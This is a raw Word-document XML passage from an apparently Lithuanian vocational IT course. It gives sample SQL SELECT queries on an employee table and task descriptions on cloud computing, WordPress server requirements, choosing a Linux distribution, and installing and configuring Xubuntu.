      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00622C5A">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS ,PAVARDE ,DIRBANUO ,PAREIGOS FROM DARBUOTOJAI WHERE DIRBANUO = '2010-08-01' AND PAREIGOS = 'Programuotojas';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00622C5A" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10.</w:t>
      </w:r>
      <w:r w:rsidR="0067486E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS ,PAVARDE ,SKYRIAUSPAVADINIMAS ,PROJEKTONUMERIS FROM DARBUOTOJAI WHERE SKYRIAUSPAVADINIMAS = 'Mažai dirbantys' OR PROJEKTONUMERIS =1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0067486E" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>11.</w:t>
      </w:r>
      <w:r w:rsidR="003B1D67">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS  FROM DARBUOTOJAI WHERE VARDAS NOT LIKE 'J%';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003B1D67" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>12.</w:t>
      </w:r>
      <w:r w:rsidR="00D60B1C">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS  ,DIRBANUO ,GIMIMOMETAI FROM DARBUOTOJAI WHERE DIRBANUO NOT BETWEEN '2009-10-30' AND '2012-11-11';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D60B1C" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>13.</w:t>
      </w:r>
      <w:r w:rsidR="00FE7107">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS ,PAVARDE ,GIMIMOMETAI FROM DARBUOTOJAI ORDER BY GIMIMOMETAI;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FE7107" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>14.</w:t>
      </w:r>
      <w:r w:rsidR="00A12031">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT VARDAS ,PAVARDE ,GIMIMOMETAI FROM DARBUOTOJAI ORDER BY GIMIMOMETAI DESC;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A12031" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">15. </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT MIN(PROJEKTONUMERIS), MAX(PROJEKTONUMERIS) FROM DARBUOTOJAI;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A12031" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>16.</w:t>
      </w:r>
      <w:r w:rsidR="00C21EB0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT PROJEKTONUMERIS, COUNT(*) FROM DARBUOTOJAI GROUP BY PROJEKTONUMERIS;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C21EB0" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>17.</w:t>
      </w:r>
      <w:r w:rsidR="004172DD">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT PROJEKTONUMERIS,PAREIGOS, COUNT(*) FROM DARBUOTOJAI WHERE PAREIGOS LIKE 'Programuotoja%' GROUP BY PROJEKTONUMERIS, PAREIGOS;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004172DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>18.</w:t>
      </w:r>
      <w:r w:rsidR="007262A2">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT PROJEKTONUMERIS,PAREIGOS, COUNT(*) FROM DARBUOTOJAI WHERE PAREIGOS LIKE 'Programuotoja%' GROUP BY PROJEKTONUMERIS, PAREIGOS HAVING COUNT(*)&gt;2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00234342" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="955" w:name="_Toc10444025"/>
      <w:bookmarkStart w:id="956" w:name="_Toc13095572"/>
      <w:bookmarkStart w:id="957" w:name="_Toc13833466"/>
      <w:r w:rsidRPr="00234342">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Modulis „</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00234342">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>rogramavimo aplinkos ir kūrimo proceso valdymas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (programinės įrangos testuotojo)</w:t>
      </w:r>
      <w:r w:rsidRPr="00234342">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="955"/>
      <w:bookmarkEnd w:id="956"/>
      <w:bookmarkEnd w:id="957"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="360" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00632545">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="958" w:name="_Toc10444026"/>
      <w:bookmarkStart w:id="959" w:name="_Toc13095573"/>
      <w:bookmarkStart w:id="960" w:name="_Toc13833467"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Kompetencija. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Naudoti tarnybi</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>nių stočių operacines sistemas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="958"/>
      <w:bookmarkEnd w:id="959"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="960"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="568" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.  DEBESŲ KOMPIUTERIJA</w:t>
      </w:r>
      <w:r w:rsidR="00FF6283">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Debesų kompiuterija (angl. Cloud Computing) – paslaugos, kurioms pateikti reikalingas tik interneto ryšys. Trumpas debesų kompiuterijos sąvokos apibrėžimas - tai apjungti skaičiavimo ištekliai, teikiami internetu paslaugos pavidalu. Debesį sudaro programos, kurių nereikia įdiegti į kompiuterį. Google Apps suteikia galimybę paleisti verslui skirtas programas naudojant tik interneto naršyklę. Tai paslaugos Google Docs, Sheets, Forms ir pan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Debesys – tai serveriai (kompiuteriai) pastoviai prijungti prie interneto į kuriuos vartotojai už tam tikrą mokestį (o kartais ir nemokamai) gali įsikelti savo norimus failus ir vėliau juos atsidaryti ar parsisiųsti iš serverio naudodami bet kurį įrenginį prijungtą prie interneto (kompiuterį, telefoną, planšetę) suvedę savo prisijungimo duomenis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Virtualusis dedikuotas serveris (VDS) – tai toks serverio tipas, kai fizinis serveris „padalinamas“ į kelis virtualius serverius. Kiekvienam virtualiam serveriui priskiriama (rezervuojama) dalis fizinio serverio resursų: atminties, diskinės talpos, procesoriaus laiko ir pan. Kiekvienas virtualus dedikuotas serveris gali dirbti nepriklausomai nuo kitų tame pačiame fiziniame serveryje esančių virtualių serverių: vykdyti skirtingas operacines sistemas, teikti skirtingas paslaugas (angl. Services) ir pan. Virtualiųjų dedikuotų serverių (VDS) paslauga nuo tinklalapių hostingo (talpinimo) skiriasi daugiausiai tuo, jog pastaruoju atveju viename serveryje tuos pačius resursus naudoja šimtai skirtingų tinklalapių ir vienam jų netikėtai sulaukus didelio vartotojų antplūdžio yra stipriai paveikiamas kitų tinklalapių pasiekiamumas. Tuo tarpu atskirti ir rezervuoti procesoriaus, disko ir atminties resursai virtualiuose dedikuotuose serveriuose leidžia išvengti panašių atvejų. Galimybė kurti virtualius dedikuotus serverius atsirado sukūrus virtualizacijos technologiją.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06"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SERVERIO IŠTEKLIAI</w:t>
      </w:r>
      <w:r w:rsidR="00FF6283">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>WordPress reikalavimai serveriui: https://wordpress.org/about/requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FF6283" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="786" w:right="282" w:firstLine="65"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6283">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PHP version 7.2 or greater.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FF6283" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="786" w:right="282" w:firstLine="65"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6283">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>MySQL version 5.6 or greater OR MariaDB version 10.0 or greater.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FF6283" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="786" w:right="282" w:firstLine="65"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6283">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>HTTPS support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Serverio parinkimas: https://www.iv.lt/dokumentai/profesionalus.pdf. Serveris gali būti Solo, Multi, Pro arba Individualus. Taip pat galima rinktis virtualų serverį su Linux arba Windows OS. Kaina priklausys nuo tinklapio apkrovimo, nes serverio resursai kainuoja priklausomai nuo pasirinkto plano.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. LINUX OS PARINKIMAS</w:t>
      </w:r>
      <w:r w:rsidR="006057BB">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Teisingas atsakymas formuojamas https://distrochooser.de/en sistemos pagalba. Atsakymas turi būti pirmi tris Linux OS pavadinimai, kuriuos pasiūlė sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06"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XUBUNTU OS DIEGIMAS VIRTUALIOJE APLINKOJE</w:t>
      </w:r>
      <w:r w:rsidR="006057BB">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Užduotis atlikta pagal šias instrukcijas: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://itsfoss.com/install-xfce-desktop-xubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://help.ubuntu.com/community/Installation?action=show&amp;redirect=InstallingXubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://virtualboxes.org/doc/installing-guest-additions-on-ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06"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XUBUNTU OS KONFIGŪRAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="006057BB">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darbas vykdomas pagal lektoriaus nurodymus. Darbas vykdomas Xubuntu OS aplinkoje. Konfigūruojame klaviatūrą: en, lt. Konfigūruojame XFce išvaizdą: pasirenkame norimą spalvinę temą.</w:t>
      </w:r>
    </w:p>
